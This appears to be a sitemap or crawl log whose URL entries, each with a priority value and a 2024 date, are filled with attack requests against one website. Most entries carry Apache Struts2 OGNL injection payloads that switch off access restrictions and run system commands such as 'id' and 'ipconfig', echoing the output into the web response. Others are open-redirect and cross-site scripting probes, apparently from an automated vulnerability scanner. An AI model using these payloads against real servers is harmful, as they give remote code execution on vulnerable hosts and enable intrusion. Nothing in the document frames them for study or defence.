http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?=%3ca03463%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%27%5b%5d_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?=%3c9ab197%20x%3d952972147%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3f=%3c9ab197+x%3d952972147%3e? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27%5b%5d_002_product.html%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27%5b%5d_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?method:%23_memberaccess%3d@ognl.ognlcontext@default_member_access,%23context[%23parameters.obj[0]].getwriter().print(%23parameters.content[0]%2b201%2b20702),1?%23xx:%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=pl3qm 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?method%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=pl3qm? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?=%3c5492a6%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27_002_product.html%3f=%3c5492a6%3c? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?=xsstest365 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz 0.5 2024-04-15 